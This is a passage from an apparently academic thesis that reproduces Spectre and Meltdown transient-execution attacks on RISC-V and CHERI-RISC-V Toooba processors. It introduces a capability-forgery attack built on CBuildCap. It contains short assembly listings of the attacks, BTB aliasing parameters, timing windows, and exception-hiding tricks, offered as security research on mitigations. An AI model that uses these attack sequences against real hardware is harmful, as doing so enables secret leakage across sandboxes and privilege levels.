Figure 4.1: Left: Spectre-BTB out-of-place, right: Spectre-BTB in-place.
to this address. This does not match the address predicted by hardware and
therefore allows an attacker to alter control-flow in speculation. I conducted
a similar attack for CHERI-RISC-V processors and because of redundancies,
the attack is only thoroughly explained in Section 5.1.5.
Another option to create a mismatch between the software and hardware
return address stacks is to – if allowed by hardware – let the RSB overflow [23,
24]. In Toooba, the RSB has room for eight return addresses. If the call depth
is greater than eight function calls, the subsequent return addresses will over-
write the ones already present. This can be used by an attacker to conduct a
Spectre-RSB attack as well. I created an attack, which causes a recursive func-
tion to call itself more than eight times. This fills all entries of the RSB with
return addresses pointing to instructions in the code of the recursive function.
The returns to the recursive function will be predicted correctly, but the jump
returning to the calling function will be mispredicted and will execute parts of
the recursive function one more time, which reads out-of-bounds values in my
example.
4.1.5 Spectre-STL
Spectre-STL is based on memory disambiguation making wrong predictions.
I successfully conducted the attack described in Figure 2.4. Again, the repro-
duction in CHERI-RISC-V assembly is similar and therefore the exact reasons
will be described in Section 5.1.6. This attack will be referred to as Spectre-
36 CHAPTER 4. RISC-V RESULTS
asm
Meltdown-US ✗
Meltdown-GP ✗
Table 4.2: Overview of attempted Meltdown-style attacks on RISC-V Toooba
and whether they were successful.
STL-Load. Besides revealing a secret through two loads, the attacker can fol-
low another goal – jumping to an arbitrary target . This attack is referred to
as Spectre-STL-Jump. This attack is based on the same principles as Spectre-
STL-Load. However, the attack requires a preparation phase in which the at-
tacker inserts a valid code address. This code address is stored at the address,
whose content is loaded twice due to wrong memory disambiguation. There-
fore, the load that is predicted to be independent does not load a secret value,
but a valid code address. If this code address is used in a jump before Toooba
recognises that its memory disambiguating was wrong, the attacker will be
able to jump to any arbitrary target.
4.2 Meltdown Attacks
In this section, I describe the Meltdown-style attacks attempted on RISC-V
Toooba. The attacks and their respective outcomes are summarised in Ta-
ble 4.2, which shows that none of the attempted attacks could be conducted
successfully. However, these two attacks are an essential part of the test suite
as their analysis shows how to prevent them. Furthermore, it is important to
test new implementations such that no conventional Meltdown-style attack is
possible.
4.2.1 Meltdown-US
For Meltdown-US, I created a scenario as it would be the case when a real
operating system is running. In my setup, the operating system code runs in S
privilege mode and has its own code and data page. The U(ser) bit is cleared for
both S mode pages, which means that U mode code cannot access these pages.
The attacker code runs in U privilege mode and also has its own code and data
page. Similar to Meltdown-US-CHERI presented in Section 5.2.1, the attacker
tries to access data without having sufficient permission – in Meltdown-US on
CHAPTER 4. RISC-V RESULTS 37
ExeMem
TLB-Req
FinishMem
Check ReorderBuf
Figure 4.2: The last two stages of the Toooba memory pipeline which performs
permission and capability checks.
the granularity of 4KiB pages.
The translation from virtual to physical addresses is conducted in the last
stage of the memory pipeline in Toooba as shown in Figure 4.2. The ExeMem
stage sends the request to the Translation Lookaside Buffer (TLB) and the
FinishMem stage receives the corresponding response. Besides the physical
address the access rights are available at this stage as well. Therefore, the
exception – a page fault – will be set to the cause field of the Load-Store
Queue (LSQ) entry of this memory access. This load will never be issued and
thus Meltdown-US is not possible on Toooba.
4.2.2 Meltdown-GP
The Meltdown-GP attack seeks to read a register, which the code has no per-
missions to read. In my reproduction of the Meltdown-GP attack, user mode
code attempts to read the CSR mcause, which is forbidden as it is a register
only accessible by M mode code. The memory access is followed by a load to
an attacker-accessible array in order to make the secret visible.
However, as marked in Table 4.2, the Meltdown-GP attack is not possible
on Toooba. Checking which privilege mode is necessary is done as a part of
the Rename stage in Toooba. If the necessary privilege mode is not present,
the Rename stage will modify the respective Reorder Buffer (ROB) entry so
that the cause field is set to the exception to be raised. Furthermore, the in-
struction is marked as executed in the entry, which means that it never enters
the ALU pipeline. Therefore, the result will never be produced, which miti-
gates the attack as the following transient-instruction sequence cannot reveal
the secret register value.
Chapter 5
CHERI-RISC-V Results
The main part of my thesis work was to extend my test framework for CHERI-
RISC-V processors. This collection of attacks shows how to practically use the
base framework presented in Chapter 4. In this chapter, I investigate whether
CHERI mitigates transient-execution attacks and how effective CHERI is in
that case. To my knowledge, this work is the first to practically reproduce
any transient-execution attack on a CHERI-RISC-V system. The attacks pre-
sented in this chapter extend the conventional attacks presented in Chapter 4.
Furthermore, I will introduce a new transient-execution attack subclass that
allows attackers to forge arbitrary and powerful capabilities in Toooba.
5.1 Spectre Attacks
As shown in Table 5.1, I successfully reproduced all four main Spectre attacks
and several applications of it on CHERI-RISC-V systems. In this section, I do
not describe every attack thoroughly as some of them have large similarities. In
this thesis work, I carried out examples in C as well. As depicted in Table 5.1,
these could be conducted successfully, but they will not be described in this
section as they do not pose a significant contribution to the vulnerability profile
of Toooba. However, an exemplary C attack is described in Appendix A.
5.1.1 Spectre-PHT
The CHERI-assembly code of my reproduction of the Spectre-PHT attack is
depicted in Figure 5.1. This is a close reproduction of the original work by
Kocher et al. [22] that has been introduced in Section 2.2.1. The example
checks whether an index (held in a0) is less than a global comparison variable
38
CHAPTER 5. CHERI-RISC-V RESULTS 39
CHERI asm CHERI C
Spectre-PHT ✓/ ✗ ✓/ ✗
Spectre-PHT Write ✗ -
Spectre-BTB ✓ ✓
Spectre-RSB ✓ ✓
Spectre-STL-Load ✓ ✓
Spectre-STL-Jump ✓ -
CHERI-Sandboxes ✓ -
Priv-Mode-Regs ✓ -
Priv-Mode-Exec ✓ -
Table 5.1: Overview of attempted Spectre-style attacks in CHERI-RISC-V
Toooba and whether they were successful. Spectre-PHT is classed as (✓/✗) as
its success depends on the concrete capability configuration.
(stored at the address pointed to by ca2). If this is the case, an array holding
secret values (with its base address being held in ca1) will be accessed at index
a0. The resulting value will be used as the index to another array (with its base
address being held in ca3). In this example, I assume that the memory ad-
dresses pointed to by ca3 are also visible to the attacker, e.g., a shared memory
page between the victim and the attacker. Furthermore, I assume that ca1 al-
lows access to more addresses than [ca1.baseaddr, ca1.baseaddr+length−1],
where length is the global comparison value stored at the address pointed to
by ca2. This can either be caused by capabilities not being configured suit-
ably or by bounds not being exactly representable due to bounds compression
as it is done with 128-bit capabilities [38].
In my example, I decided to train Toooba’s tournament predictor to always
choose the local predictor, which will then return not taken. In order to reach
that, I call the assembly code in Figure 5.1 eight times with values for a0 such
that the a0 ∈ [0, . . . ,0x1f] holds. This will train the local BHT to return not
taken for this particular branch and train the selector to always choose the local
predictor for this branch. My choice for the other parameters remains the same
over the training phase and is shown in Table 5.2. After the training phase, the
attacker can start the actual attack.
For the actual attack, I choose the index to the secret array to be 0x40
(a0 = 0x40). For all other parameters, I use the values presented in Table 5.2.
As a preparation of the attack, I ensure that the load to the address stored in
40 CHAPTER 5. CHERI-RISC-V RESULTS
// a0: index to secret array
slli t1, a0, 3
cincoffset ca1, ca1, t1 // ca1: secret array base addr.
cld t0, 0(ca2) // ca2: comparison value
bge a0, t0, end
cld t2, 0(ca1) // access secret value
// use spec. execution
cincoffset ca3, ca3, t2 // ca3: shared mem. page
cld t2, 0(ca3)
end:
// other code
Figure 5.1: Reproduction of the Spectre-PHT attack in CHERI assembly.
Capability Reg Description
ca1: capability spanning [0x80001000 ,0x80001fff ]
ca2: capability spanning [0x80002000 ,0x80002007 ]
8 byte value 0x20 at this address
ca3: capability spanning [0x80003000 ,0x80003fff ]
Table 5.2: Parameter configuration used for the Spectre-PHT attack.
ca2 will miss all caches. This is important to the attacker as the outstanding
load poses a dependency to the following branch instruction. Because of the
previous training phase, the branch bge will be predicted to not taken. This
means that from this point on the code following the branch instruction will be
mispredicted and therefore executed transiently. Due to the outstanding load
the misprediction cannot be resolved for the entire miss penalty time of the
load. The first speculative load following the mispredicted branch instruction
will be a memory access to the address 0x80001200 returning the value 0x200
in my example. This value is added in the next instruction to ca3, which points
to a memory region also accessible to the attacker. However, the first load was
illegal because the code does not allow accesses to addresses 0x80001100 or
greater. Later, Toooba will resolve this and rollback the speculatively executed
instructions, but the second load to an attacker accessible array has already
been issued and can be detected by the attacker.
This attack is classed as (✓/✗) as its success depends on the configuration
CHAPTER 5. CHERI-RISC-V RESULTS 41
of the capability used for the first load. In both cases the code forbids the
first memory access, but the capability configuration is different in these two
instances of Spectre-PHT. If the capability is configured such that the mem-
ory access is out of capability bounds, the attack will not work. Otherwise,
the attack will work. For the explanation of why the capability configuration
mitigates the attack, see Section 5.2.1.
The important factor in this attack is the miss penalty of the load through
ca2. If this load missing all caches returns before the second load has been
issued, the attack will not be successful because Toooba will detect the mis-
prediction and not issue the second load and thus the attacker cannot detect the
timing difference through the cache later. In my simulation, it took the load
61 cycles from leaving the core until the value has returned. The first specula-
tive load is issued one cycle later and the second speculative load seven cycles
after the first load. Therefore, Spectre-PHT works as 53 cycles are left. This
means that an attacker can effectively use the spare cycles for executing other
transient instructions that reveal more complex internal state, e.g. shifting and
adding register values and then performing a load dependent on this data.
5.1.2 Spectre-PHT-CHERI-Write
When code is using capabilities in Toooba, this attack is successfully miti-
gated by CHERI. In my example, the attacker writes a double word to memory,
which effectively clears the tag bit of the capability stored at this address as
the stored data is no capability itself. Therefore, when the load of the return
address is conducted, this will lead to an invalid code capability being stored
into the return address register. Toooba cannot jump to this capability and
therefore this specific attack is successfully mitigated. Furthermore, a suitable
capability configuration, which enforces tight bounds, mitigates this specific
attack and variants of it in the first instance as described in Section 4.2.1.
5.1.3 Spectre-BTB on CHERI-Sandboxes
Sandboxes are designed to have strong memory protection against each other.
One sandbox is not allowed to leak secrets to another sandbox. Inspired by
Jonathan Woodruff and Jessica Clarke, I created an example that allows an
adversary sandbox to leak information from another sandbox. Software com-
partmentalisation is one of the main goals of CHERI – this attack has specif-
ically been designed to circumvent compartmentalisation and leak secrets of
a victim sandbox. This example contains two sandboxes. One of them is an
42 CHAPTER 5. CHERI-RISC-V RESULTS
sand1_code:
// load capability to jump to
clc ct1, 16(ct6)
// load pcc into cs7
auipcc cs7, 0
// this jump is aliased in the BTB
cjr ct1
Figure 5.2: Code snippet of victim code in a sandbox which is under attack.
adversary sandbox, the other one is benign. The benign sandbox is referred to
as sand1, whereas the attacker sandbox is called attackbox.
The code of sand1, which is the victim sandbox being attacked by attack-
box, is depicted in Figure 5.2. The first instruction in the code of sand1 loads
a capability from memory and the last instruction jumps to it. The second in-
struction, auipcc, adds the second operand – shifted by 12 bits to the left –
to the current PCC. Since the second operand is zero in this example, auipcc
writes the current PCC to cs7. This is a common way to produce capabilities
for accessing data in CHERI-RISC-V and is regularly used by CHERI-LLVM.
Attacking Toooba’s BTB
The goal of the attack is to trick Toooba into speculatively jumping from the
benign sandbox sand1 into the attacker sandbox attackbox. Speculation for
indirect jumps – these are jumps like cjr ct1 – is done with help of the
BTB. To fully understand the design of the attack, I need to explain Toooba’s
BTB and the hashing function I added. The BTB is an indexed array with 256
entries of the form depicted in Figure 5.3. An entry has three fields: one valid
bit, an 8-bit tag, and the destination PCC target. When a jump is taken, a BTB
entry will be updated. The index of this entry is determined by PCCj[8 ∶ 1],
where PCCj is the PCC of the jump instruction. PCCj[X ∶ Y ] denotes a
selection of bits X down to Y from PCC, where the index 0 is the Least
Significant Bit (LSB) and index bitfield.length − 1 is the Most Significant
Bit (MSB) of a bit field. The tag is calculated by splitting up the address of
PCCj into bytes and XOR-ing all eight bytes. The target PCC is the PCC to
be executed in case the jump is taken. If a BTB entry is updated, its valid bit
will be set. The valid bit of each entry is zero at the start-up of the branch or
if set so by hardware, e.g., if branch prediction state flushing is implemented
as described in Section 2.3.2. When a branch prediction from the BTB is
CHAPTER 5. CHERI-RISC-V RESULTS 43
V ’1 Tag’8 Target’129
Figure 5.3: Fields of an entry in Toooba’s BTB.
required, the index and the tag for that PCC is calculated and only if the valid
bit at that index is set and if the calculated tag compared the tag stored at
that index is equal, this is deemed a valid branch prediction and Toooba will
speculate to the target PCC of this entry.
The attacker wants to place an entry into the BTB so that the jump in Fig-
ure 5.2 speculatively leads to attacker chosen code execution when the victim
sandbox sand1 executes the next time. For this attack, I assume that the at-
tacker can freely choose the address where their code is placed in the address
space. In order to alias a BTB entry, an attacker needs to place a jump in-
struction at an address so that the following requirements are fulfilled, where
PCCb is the PCC of the jump in the victim sandbox, PCCa is the jump in
the attacker sandbox, addr() is the function that extracts the address of the its
argument PCC, and tag() is the function that calculates the tag by XOR-ing
the bytes of the respective PCC:
PCCb[8 ∶ 1] = PCCa[8 ∶ 1] (5.1)
tag(addr(PCCb)) = tag(addr(PCCa)) (5.2)
Mapping the attacker jump instruction to the same index in the BTB is
an easy task for an attacker. The more interesting task is to align the PCC of
the attacker jump instruction so that the tag value equals the tag of the victim
sandbox PCC tag. The sandbox to be attacked – sand1 – has a PCC with
the start address 0x80020000 and the length is 0x2000. The jump instruction
cjr ct1 is at the PCC: 0xffff200000018005_0000000080020244 . This is
the entire 128 bit code capability. As depicted in Figure 2.5, the upper 64 bits
contain the otype, the permissions, and the compressed bounds whereas the
lower 64 bits contain the actual address. The address is important in this attack
scenario and therefore separated by an underscore character from the rest of
the capability. I did not include the tag bit for capabilities in the description in
this subsection. It is obvious that all capabilities need to have valid tag bits in
order to be used for jumping and dereferencing memory. I chose the attacker
sandbox attackbox to start at the address 0x80040000 and have a length of
0x20000. I decided to choose 0xffff20000001a001_0000000080042044 as
the PCC for the jump. With that I wanted to demonstrate that it is possible
44 CHAPTER 5. CHERI-RISC-V RESULTS
to conduct the attack in a single address-space operating system and that both
victim and attacker sandbox do not need to have the same bounds:
PCCb = 0xffff200000018005_0000000080020244 (5.3)
PCCa = 0xffff20000001a001_0000000080040444 (5.4)
tag(addr(PCCb)) = tag(addr(PCCa)) = 0xc4 (5.5)
PCCb[8 ∶ 1] = PCCa[8 ∶ 1] = 0x22 (5.6)
Conducting the Attack
Now, that we have understood how to alias an entry in the BTB, we have done
the most important part of the attack. The next step an attacker needs to con-
duct, is to actually place an entry at the respective index – this can be con-
sidered the training phase of the BTB. In order to achieve this, the attacker
runs its code – including the jump at PCCa – that branches to an attacker
chosen target. This target is the gadget the victim sandbox will speculatively
jump to during the actual attack. Suitable targets are explained in the follow-
ing paragraphs. The second training step is to ensure that the first instruction
in Figure 5.2 misses all caches in order to successfully misspeculate as long
as possible. If this was not the case, Toooba would quickly load the correct
PCC to jump to and correct its misspeculation before the transient-execution
sequence in the target gadget could take effect. After this training phase, the
attacker triggers or awaits the next execution of sand1. The load will miss all
caches and Toooba will speculatively jump to the attacker’s gadget with the
entire register state of sand1 being present.
The attacker can use the register state from sand1 in multiple ways to
achieve different goals of their attack. First, the attacker can leak one or more
secret values stored in a register. This can be the case if sand1 computes on
secret data, e.g., an encryption key. In order to reveal the secret, the attacker
performs a load to an attacker accessible array index by the secret. Second,
the register state can give the attacker access to a memory location of inter-
est, e.g., because only sand1 has a capability to this memory location. The
attacker loads the value of interest and conducts a second load to an attacker
accessible array indexed by that value in order to reveal it. Furthermore, it
is possible to load other capabilities through capabilities being present in the
current register state of the victim. In my example of the attack, I sought to use
the second method. The load missing all caches needs 88 cycles from being
issued to memory until returning to the core. The first speculative memory
CHAPTER 5. CHERI-RISC-V RESULTS 45
access in the gadget fetching the secret into the core is issued with 20 cycles
left and the revealing load with 12 cycles left, which explains why the attack
is successful.
This sandbox attack includes the basic Spectre-BTB attack as demonstrated
in [22]. The pure Spectre-BTB attack has also been reproduced in this thesis
work, but will not be shown since its mechanism is included in this attack. Fur-
thermore, I produced other Spectre-BTB attacks, e.g., attacking direct jumps
and similar attacks. However, these were either not successful or could not
contribute to attack Toooba in a way not already explained. Therefore, I don’t
explain these attacks in this text.
5.1.4 Priv-Mode Attacks
The sandbox attacks bring up the question whether it is possible to speculate
over different privilege modes in RISC-V. I constructed two attacks proving
the hypothesis that it is possible, which are referred to as Priv-Mode-Regs and
Priv-Mode-Exec in Table 5.1. For both attacks, the scenario is that privileged
code, e.g., kernel code, is being executed in S privilege mode, whereas the at-
tacker code resides in U privilege mode. The goal of both attacks is to specula-
tively jump to the gadget chosen by the attacker. This scenario can be found in
real-world attacks as well as operating systems usually run in S privilege mode
in RISC-V [12]. A real-world attack for this scenario is further explained in
Section 6.1.4. None of the priv-mode attacks is possible if the Supervisor User
Memory (SUM) bit is cleared in sstatus. This mechanism prevents code
running in S mode from accessing pages that are accessible by U mode code1.
The SUM mechanism and related principles are thoroughly explained in the
privileged specification [12].
Priv-Mode-Regs
This attack is close to the sandbox attack presented in Section 5.1.3. The goal
of this attack is to speculatively jump from S privilege mode to U privilege
mode in order to use the register state set up by the S mode code. The two
main parts of the attack are again aliasing an entry in the BTB and delaying
a load such that a jump depending on that load will speculatively lead to the
execution of the attacker’s chosen gadget residing in U mode. Equal to the
sandbox attack, the goal of the attacker is to make use of the register state
1Code pages accessible by U privilege mode code have the U(ser) bit set in the respective
PTE.
46 CHAPTER 5. CHERI-RISC-V RESULTS
of the S mode code by either leaking a value from or through the register
state. I constructed an attack that manages to leak a value through a powerful
capability of the kernel being present in the current register state. Another
particularly interesting target are Special Capability Registers (SCRs) as they
are expected to hold powerful capabilities.
Priv-Mode-Exec
The difference of this attack compared to the Priv-Mode-Regs attack is that
the attacker-chosen gadget makes use of the fact that the processor continues
to execute in S privilege mode in speculation. This means that the attacker has
permission to access CSRs. In my example, the gadget accesses sscratch –
which has been previously written to by the kernel – and then performs a load
to an attacker accessible array indexed by the value in sscratch. This attack
requires the PCC in U privilege mode to have its Access System Registers
(ASR) set as ASR restrains access to both CSRs and SCRs. RISC-V constrains
the access to CSRs by privilege modes, but CHERI-RISC-V adds the ASR
functionality on top. ASR restricts access to all CSRs, but seven white-listed
ones in which sscratch is not included [37]. This attack demonstrates how
to make use of the register values accessible to the code the speculative jump
came from.
For this attack, it is important to understand that the privilege mode a
RISC-V microprocessor currently operates in is an internal state and can only
be influenced by traps and their respective return operations. Furthermore,
this means that code can be executed in every privilege mode as long as it
does not contain privilege mode specific instructions, as for example mret
that can only be used in M privilege mode. A mret instruction executed in S
or U privilege mode will lead to an exception being raised. In my example the
revealing gadget is executed in both S and U privilege mode.
5.1.5 Spectre-RSB
Similar to the BTB, the RSB can contain powerful capabilities that can be of
use for an attacker. The code depicted in Figure 5.4 shows an example of priv-
ileged code that is called from user space. First, the code loads a new address
into the return address register cra. Next, the code loads its PCC into a reg-
ister, adds an offset to the capability address and stores a secret value to this
memory location. Finally, the code returns to the address previously loaded
into cra. However, Toooba will predict the return address and use the top
entry of the RSB for the prediction. This entry is a capability pointing to the
CHAPTER 5. CHERI-RISC-V RESULTS 47
kernel_funct:
// load new return address
clc cra, 0(cs2)
// load kernel pcc into ct6
auipcc ct6, 0
li t1, 0x200
cincoffset ct6, ct6, t1
li t1, 0x400
// store secret
csd t1, 0(ct6)
// return
cret
Figure 5.4: Privileged code whose return address will be mispredicted in the
Spectre-RSB attack.
next instruction of the calling function. The RSB contains this entry because
the call to the privileged function caused the hardware to push it there. There-
fore, Toooba will speculatively jump to unprivileged code with the register
state of the privileged code. In fact, Toooba will always speculatively jump to
the next instruction of the calling code in the example depicted in Figure 5.4.
Later, Toooba will jump to the actual PCC when it realises its misspeculation.
Spectre-RSB gives the attacker the same possibilities to make use of the reg-
ister state of the privileged code as Spectre-BTB does. I created an example
that uses a powerful capability in the speculative register state in order to pull
a secret into the core and make it visible to the attacker via a second load.
What this attack needs is a mismatch between the software return address
and the address stored in the RSB. In my example, this is achieved by loading
another address into cra. For the attack to work, I made this load miss all
caches. This gives attackers the biggest possible time window to transiently
perform other loads that make the secret visible. As described in Section 4.1.4,
overflowing the RSB can also create a mismatch between hardware and soft-
ware return addresses. I successfully conducted this attack type in CHERI-
RISC-V assembly as well. Note that this only works if the capabilities allow
these memory accesses following previous explanations.
48 CHAPTER 5. CHERI-RISC-V RESULTS
clc ca1, 0(cs1)
// ca1 and cs2 hold the same capability
csd a4, 0(ca1)
// memory disambiguation will lead to
// this being executed with stale data
cld a2, 0(cs2)
cincoffset cs3, cs3, a2
cld a3, 0(cs3)
Figure 5.5: Reproduction of the Spectre-STL attack in CHERI-RISC-V as-
sembly.
5.1.6 Spectre-STL
Spectre-STL-Load and Spectre-STL-Jump both rely on the fact the memory
disambiguation predicts a store-load pair to be independent although they ac-
cess the same memory address. As shown in Table 5.1, both Spectre-STL
variants work in CHERI-RISC-V Toooba.
Spectre-STL-Load
The code depicted in Figure 5.5 shows the sequence of instructions build-
ing the actual attack. The first instruction loads the capability at the address
pointed to by cs1 into ca1. I constructed the attack such that cs2 is stored
at this memory address. In my example, ca1 and cs2 are identical capabil-
ities, but in order for the attack to be successful they only need to point to
the same memory address. The following store and load instructions are ex-
ecuted out-of-order and in the assumption that they are non-dependent since
they use different capability registers for memory accesses. However, this is
not the case as both the store and the load go to the same memory address. This
load will be executed earlier than the store and therefore it does not return the
data of the store, but the previous content stored at this memory address. The
transient-instruction sequence following the load of the stale data will reveal
the secret data. Issuing a load of a value indexed by the secret to an attacker
accessible array with its base address stored in cs3 makes the secret visible
to the attacker.
Toooba’s memory disambiguation and out-of-order execution enable this
attack. When a memory instruction reaches the Rename stage, one instruction
per cycle is enqueued to the memory reservation station from which the mem-
CHAPTER 5. CHERI-RISC-V RESULTS 49
ory pipeline pulls out its instructions. The memory pipeline will execute the
instructions as soon as all source register values are available. Toooba does
not have a dedicated unit for disambiguating memory accesses – it assumes
that memory accesses to different registers are not dependent. In case they
are, Toooba will perform a rollback and re-execute the affected instructions.
In my example, the first load introduces a delay for the second instruction as
they overlap in architectural register use. The second instruction cannot pro-
ceed in the memory pipeline. However, the third instruction can proceed in the
memory pipeline and produce its result as it does not overlap in architectural
register use. This leads to the transient-instruction sequence being executed
with stale memory data.
Spectre-STL-Jump
The setup for this attack is similar to the attack on RISC-V Toooba presented
in Section 4.1.5 with the difference that capabilities are used instead of in-
teger pointers. The fact that the stale value being loaded is not data, but a
valid code capability does not change the feasibility of this attack. The code
capability is valid and therefore Toooba takes the indirect branch to this ca-
pability’s address. Analogously to Spectre-STL-Load, the memory accesses
are not out-of-bounds and hence CHERI does not prevent this sequence of
speculative instructions. The attack works because Toooba generally assumes
memory operations not to be dependent as described above.
5.2 Meltdown Attacks
Table 5.3 shows an overview of the Meltdown attacks reproduced on CHERI-
RISC-V Toooba during this thesis work and whether they were successful.
Analogous to presenting the Spectre attacks, some attacks show large similar-
ities and therefore the common attacking techniques are explained only once.
5.2.1 Meltdown-US-CHERI
Meltdown-US-CHERI is an adaption of Meltdown-US. Instead of attempting
to read from a page, which the attacker does not have sufficient rights to ac-
cess, I attempted to read from a memory address through a capability out of
its bounds. This attack is especially tailored to CHERI – the results of the re-
production of the original Meltdown-US attack are presented in Section 4.2.1.
50 CHAPTER 5. CHERI-RISC-V RESULTS
CHERI asm
Meltdown-US-CHERI ✗
Meltdown-GP-CHERI ✗
CBuildCap-Load ✓
CSetBounds-Load ✓
CInvoke-Load ✓
CUnseal-Load ✓
Table 5.3: Overview of attempted Meltdown-style attacks on CHERI-RISC-V
Toooba and whether they were successful.
The code for the attack is shown in Figure 5.6. The attack consists of three
basic parts. First, the attacker increases the offset to a desired address out of
capability bounds. The reader has to note that in CHERI setting the address
out of bounds is no illegal operation itself, but the memory access itself is.
This memory access done with the second instruction is the next part of the
attack. This loads the desired secret into the register t2. The following two
instructions are the final part of the attack and reveal the secret by a load to an
attacker accessible array with its base address in ct1.
However, this attack could not be conducted successfully in CHERI-RISC-
V Toooba. Its memory pipeline consists of multiple stages that dispatch the
instruction, read the register values, calculate the virtual address, translate the
virtual address to the physical address, and finally enqueue the memory access
into the LSQ. The last two pipeline stages are depicted in Figure 4.2. In the
last pipeline stage, Toooba performs the capability bounds checks and sets the
exception cause field in the corresponding LSQ entry in case an exception is
detected. Toooba only issues valid requests – without the cause field set – to
memory. Therefore, the out of bounds load will never be issued, which effec-
tively mitigates the entire attack. No revealing transient-execution sequence is
possible because the necessary result never becomes available.
5.2.2 Meltdown-GP-CHERI
The Meltdown-GP attack – presented in Section 4.2.2 and the Meltdown-GP-
CHERI attack have large similarities. Both attacks seek to read a register,
which the code has no permissions to read. In my Meltdown-GP-CHERI ex-
ample, the attacker wants to access the SCR mscratchc, which cannot be ac-
cessed if the current PCC does not have the ASR bit set, which is the case in my
CHAPTER 5. CHERI-RISC-V RESULTS 51
melt_us_cheri:
// set ct0 offset out of bounds
cincoffsetimm ct0, ct0, 512
// perform load out of capability bounds
cld t2, 0(ct0)
// load again from another capability with offset
cincoffset ct1, ct1, t2
cld t2, 0(ct1)
Figure 5.6: Reproduction of the Meltdown-US attack tailored to CHERI ca-
pabilities.
setup for this attack. The access is followed by a load to an attacker-accessible
array in order to make the secret visible. Meltdown-GP-CHERI is therefore
a variant of Meltdown-GP tailored to CHERI systems as they offer the ASR
functionality compared to conventional RISC-V systems. However, as marked
in Table 5.3, this attack is not possible on CHERI-RISC-V Toooba. Similar to
the description of Meltdown-US in Section 4.2.2, checking whether the ASR
bit is set is done as a part of the Rename stage in Toooba. This leads to the
instruction being marked as executed in the ROB entry, which means that it
never enters the ALU pipeline. Therefore, the result will never be produced,
which mitigates the attack as the following transient-instruction sequence can-
not reveal the secret register value.
5.2.3 Meltdown-CF
Meltdown-CF (Capability Forgery) is a new subclass of transient-execution
attacks that was developed in this master’s thesis work. The goal of all at-
tacks in this subclass is the same: forging a capability to memory that the
attacker should not have access to in speculation and using this accordingly
in order to leak secrets. Therefore, Meltdown-CF attacks pose a large threat
to CHERI systems. All attacks in the Meltdown-CF class are inspired by
Jonathan Woodruff and members of the CHERI team who suspected a vul-
nerability in CHERI-RISC-V Toooba and encouraged me to attempt these ex-
ploits.
52 CHAPTER 5. CHERI-RISC-V RESULTS
CBuildCap
The CBuildCap instruction has been added to CHERI-RISC-V in order to
increase performance when importing capabilities. CBuildCap attempts to
build a capability from a bit pattern. This instruction has three operands: The
bit pattern stored in a capability register, an authorising capability stored in
another capability register, and the destination capability register. The bit pat-
tern does not need to be tagged, but it must not pose an escalation of privileges
of the authorising capability. If this invariant is broken, an exception will be
raised [37]. The CBuildCap instruction can be logically split into two sub-
operations. First, the capability checks have to be conducted. Second, if the
capability checks were successful, the input capability bit pattern is tagged –
therefore becomes a valid capability – and written to the destination register.
The main part of the attack code is depicted in Figure 5.7. This code is
expected to run in an attacker controlled compartment whose PCC is limited
to certain addresses. In this scenario, the attacker can be a user that now acts as
an adversary on a CHERI system. The goal of the attacker is to speculatively
craft a powerful capability in order to read secrets of other compartments.
The register a0 holds the index to be used to access the speculatively created
capability and ca1 holds the bit pattern to be used with CBuildCap. The
index is shifted logically left by four bits in order to produce 16 byte memory
chunks to be accessed. The attack is designed such that the load following
the shift instruction will miss all caches and therefore produces the maximum
load penalty possible. The CBuildCap instruction is not dependent on the
previous instructions and can be executed out-of-order before the load has to
finish. In fact, all instructions following the load are not dependent on the
load. Therefore, all of these instructions can be executed before the slow load
finishes, but none of them can commit before the load commits.
The CBuildCap instruction has cs1 as authorising capability, which is
derived from DDC, but limited to the addresses [0x80001000−0x80002000],
which in my example is the most powerful data capability the attacker has
access to. The bit pattern passed in ca1 is the almighty capability spanning
the entire address space with the tag bit stripped. However, this breaks the
invariant that the authorising capability must be equally or more powerful than
the bit pattern. The CBuildCap instruction will fail, but for now we assume
that it does not and that all subsequent instructions will be executed normally.
Next, the attack uses the index calculated before and adds it to the capability
address. This is the address of the secret value, which is loaded in the next
instruction. This secret value is used as an index to a user accessible array,
CHAPTER 5. CHERI-RISC-V RESULTS 53
access_funct:
// a0: index to 16 byte chunks
// ca1: bit pattern for capability to be build
slli a0, a0, 4
// misses all caches and produces
// maximum miss penalty
cld t1, 0(cs1)
// will raise an exception, but before
// that it will reveal the secret
cbuildcap ct2, cs1, ca1
cincoffset ct2, ct2, a0
// load twice to reveal secret
cld t0, 0(ct2)
cincoffset cs7, cs7, t0
cld t0, 0(cs7)
cret
Figure 5.7: Overview of the CBuildCap attack code.
which cs7 is the base address of. The load to this address reveals the secret
to the attacker as they can probe the user accessible array later in order to find
out the secret value.
Toooba’s ALU has four pipeline stages: Dispatching the instruction to
the ALU, reading the register values, doing the actual operation, and writing
back the calculated value. Toooba reverses the order of the sub-operations for
CBuildCap in order to improve performance. It first tags the input data and
then performs the capability checks, which are called CapMod and CapCheck
in Figure 5.8. This means that there exists a tagged capability that has not
been checked yet in the actual executing stage. In the next stage, the writeback
stage called FinishALU in Figure 5.8, Toooba performs the actual checks and
finishes the execution of CBuildCap by marking it as executed in the ROB.
This will also set a field in the ROB that this instruction created an exception.
In order to improve performance Toooba uses forwarding of ALU results to
subsequent operations. In general, forwarding avoids stall cycles that would be
introduced by writing the result to the register file and other operations having
to wait to read this value. Toooba, uses forwarding in both the ExeAlu and the
FinishALU stage as well as writing the data to the register file in the FinishALU
stage. For my attack, this means that the powerful tagged capability will be
54 CHAPTER 5. CHERI-RISC-V RESULTS
RegisterFile
ExeALU
CapMod
speculativecapabilityvalues
trapcode
FinishALU
CapCheck ReorderBuf
Figure 5.8: The last two stages of the Toooba ALU pipeline which forwards
modified capabilities before performing capability checks.2
forwarded to subsequent instructions which use the result of the CBuildCap
instruction.
An instruction commits when it is at the head of the ROB. Toooba raises
an exception at the commit phase because at this point of time it is certain
that the exception really occurred as the exception could have also come from
a speculative execution path that should not have been taken. In the mean-
time, the speculatively crafted almighty capability can be freely used to access
the entire memory space, e.g., to read secret memory of other compartments.
This is possible because – as many other processors – Toooba does not stall
its pipeline in case of a speculative hardware exception in order to increase
performance.
The attack – as depicted in Figure 5.7 – will cause the operating system to
react to the hardware exception being raised. This will lead to the termination
of the process running this code, which can be disadvantageous for the attacker
for two reasons. First, the attacker often wants to conduct the attack multiple
times and therefore wants to keep the victim process running. Second, the
exception will entail a call to the operating system’s exception handler, which
will perform load operations itself and therefore might cause a lot of noise
from the attacker’s point of view.
As described in [27], an attacker has multiple options to hide the exception.
One option is to fork a child process and execute the attack code there. This
will solve the problem of keeping the actual attack process open, but still the
child process will trigger the invocation of the exception handler and poten-
